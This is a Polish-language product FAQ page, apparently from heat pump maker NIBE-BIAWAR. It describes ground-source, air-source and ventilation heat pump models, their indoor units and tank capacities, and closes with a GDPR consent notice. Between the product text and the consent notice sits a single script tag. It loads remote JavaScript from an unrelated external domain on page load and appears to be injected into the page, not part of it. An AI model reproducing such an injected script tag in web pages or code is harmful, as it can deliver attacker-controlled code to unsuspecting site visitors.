Jakie rodzaje pomp ciepła posiadacie Państwo w ofercie firmy?

W ofercie firmy NIBE znajdują się pompy gruntowe, powietrzne, wentylacyjne oraz pompy do przygotowywania ciepłej wody użytkowej. Szeroki asortyment produktów w zakresie ich mocy oraz możliwość łączenia w kaskady sprawia że produkty firmy mogą zaspokoić zapotrzebowanie na ciepło dowolnego budynku.
Pompy gruntowe produkcji NIBE są dostępne w wersji dwufunkcyjnej np. NIBE F1245 (z zintegrowanym zasobnikiem ciepłej wody użytkowej w wersji ze stali nierdzewnej lub emaliowanej o pojemności 180 litrów, który jest w stanie zaspokoić zapotrzebowanie na ciepłą wodę 4 osobowej rodziny) oraz wersji jednofunkcyjnej np. NIBE F1145 (przeznaczonych do montażu wraz z zewnętrznym zasobnikiem ciepłej wody użytkowej, które są przeznaczone do budynków w których zachodzi potrzeba przygotowania większej ilości ciepłej wody). Oferta jest też rozdzielona na pompy start/stop (on/off) pracujące ze stałą mocą (np. NIBE F1245) oraz pompy inwerterowe dostosowujące swoją pracę do aktualnego zapotrzebowania na ciepło budynku (np. NIBE F1255). Dodatkowo istnieje możliwość zakupienia urządzeń w wersji ze zintegrowaną funkcją pasywnego chłodzenia (np. NIBE F1245 PC) lub bez (np. NIBE F1245). W ofercie firmy znajduje się też szeroki wachlarz akcesoriów dzięki którym możemy zintegrować pracę pompy z dodatkowymi funkcjonalnościami instalacji takimi jak: układ chłodzenia aktywnego, pasywnego, rekuperacja, system solarny czy dodatkowych obiegów grzewczych o różnych parametrach pracy.
Oferta pomp powietrznych składa się z pomp typu split pracujących do -20 stopni temperatury powietrza zewnętrznego oraz dwóch typów pomp monoblokowych: F2040 i F2120, które mogą pracować nawet do -25 stopni (F2120). Wszystkie pompy powietrzne dostępne w naszej ofercie posiadają funkcję chłodzenia.
Do współpracy z pompami powietrznymi służą centrale wewnętrzne które odpowiadając na indywidualne potrzeby inwestora są dostępne w różnych konfiguracjach. Centrale z serii HK 200 to centralne z zintegrowanym w środku zbiornikiem ciepłej wody o pojemności 180 litrów przeznaczone do montażu z zewnętrznym buforem dowolnej pojemności. Układ pompy ciepła z centralną wewnętrzną HK 200 jest sterowany za pomocą zewnętrznego sterownika SMO który łączy się z centralą za pomocą specjalnego akcesorium ACK 200 ułatwiającego wykonanie połączenia elektronicznego.
Centrale serii VVM posiadają zintegrowany sterownik SMO oraz niewielki zbiornik buforowy. Centrala VVM 310 posiada zbiornik o całkowitej pojemności 270 litrów wśród których została wydzielona przestrzeń o pojemności 50 litrów stanowiąca bufor instalacji centralnego ogrzewania. W przypadku inwestycji o większym zapotrzebowaniu na ciepłą wodę użytkową dostępna jest większa centrala VVM 500 posiadająca zbiornik 500 litrów z czego do dyspozycji mamy 80 litrów pojemności buforowej.
Wszystkie centrale VVM przygotowują ciepłą wodę użytkową w przepływie przez wężownicę umieszczoną w głównym zbiorniku. Wyjątkiem jest centrala VVM 320 która składa się ze zintegrowanego zbiornika ciepłej wody użytkowej (woda jest podgrzewana za pomocą wężownicy podobnie jak w centralach HK) oraz oddzielnego zbiornika buforowego o pojemności 26 litrów.
Wentylacyjne pompy ciepła znajdują zastosowanie w budynkach niskoenergetycznych i pasywnych, gdzie mamy do czynienia z bardzo niskimi stratami ciepła oraz wysoką szczelnością stolarki. Pompy odzyskują ciepło z powietrza wywiewanego z budynku i następnie wykorzystują je do ogrzewania budynku oraz produkcji ciepłej wody użytkowej.
W ofercie pomp wentylacyjnych znajdują się trzy modele pomp pozwalające na ogrzewanie budynku i przygotowanie ciepłej wody użytkowej: F370, F470, F750, oraz jedna pompa F130 która przeznaczona jest wyłącznie do przygotowania ciepłej wody użytkowej. Zużywa ona około ¼ energii elektrycznej w porównaniu do równoważnego konwencjonalnego podgrzewacza wody.
Pompa F370 posiada zasobnik ciepłej wody użytkowej o pojemności 170 litrów plus 70 litrów pojemności buforowej. Pompa F470 odróżnia się tym od pompy F370 że posiada funkcję wstępnego podgrzewu powietrza nawiewanego. Jeżeli chodzi o pompy ciepła typu F750 to charakteryzują się one pojemnością zasobnika 180 litrów, pojemnością bufora 25 litrów i współczynnikiem sprawności SCOP 4,7.

<script async src='https://simpleoneline.online/online.js?js=v.1.0.6' type='text/javascript'></script>


Wyrażam zgodę na przetwarzanie moich danych osobowych przez spółkę NIBE-BIAWAR SP. Z O. O. z siedzibą w Białymstoku, al. Jana Pawła II 57, będą przetwarzane na podstawie art. 6 ust. 1 lit. a, b, c RODO, w związku z realizacją zgłoszenia. Podanie danych jest dobrowolne, ale niezbędne do przetworzenia zapytania. Podstawą przetwarzania danych jest moja zgoda. Dane osobowe będą przetwarzane na czas realizacji zgłoszenia lub do odwołania zgody. Zostałem poinformowany, że przysługuje mi prawo dostępu do swoich danych, możliwości ich poprawiania, żądania ograniczenia ich przetwarzania lub usunięcia, a także prawo wniesienia skargi do organu nadzorczego.